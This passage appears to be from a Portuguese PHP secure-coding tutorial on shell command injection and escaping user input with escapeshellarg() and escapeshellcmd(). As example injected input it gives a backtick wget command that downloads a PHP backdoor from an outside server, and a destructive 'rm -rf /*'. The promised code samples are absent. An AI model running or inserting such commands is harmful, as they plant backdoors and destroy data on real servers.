Imagine a seguinte chamada de sistema:

Por algum motivo o desenvolvedor precisa usar um ls ou um tar no seu servidor e muitas vezes utilizam como argumentos dados enviados pelo usuário.

Observe agora o argumento abaixo passado pelo usuário:

1 - $dir = `wget -b http://www.servidor_sem_suporte_a_php/backdoor.php` ./
2 - $dir = `rm -rf /*` ./

Uma backdoor em PHP seria plantada dentro do seu sistema no primeiro caso, no segundo todos os arquivos que você tem acesso seriam removidos do servidor.

A função PHP escapeshellarg() adiciona aspas simples em torno de uma string e escapa qualquer as aspas simples existentes permitindo a você passar uma string diretamente para uma função shell e tendo ela tratada como um argumento seguro, ou seja, a aspas cruzadas nos dois exemplos anteriores se fossem escapados corretamente seriam interpretados como texto e não mais como metacaractere.

Agora sim esse seria um exemplo de código seguro.

Escapando metacaracteres shell

Seguindo a mesma linha de raciocínio a sua função "irmã" escapeshellcmd() escapa qualquer caracter em uma string que possa ser utilizado para enganar um comando shell para executar comandos arbitrários. E é bastante recomendado o uso desta função para se ter certeza que quaisquer dados vindos do usuário é escapado antes que estes dados sejam passados para as funções exec(), system() ou passthru(), ou para um operador backtick. Alguns exemplos seguem abaixo:

Nesse exemplo a string $e está escapada e não aceita código arbitrários:

Já nesse segundo exemplo além da string estar escapada tomamos o cuidado para $f não ter espaços.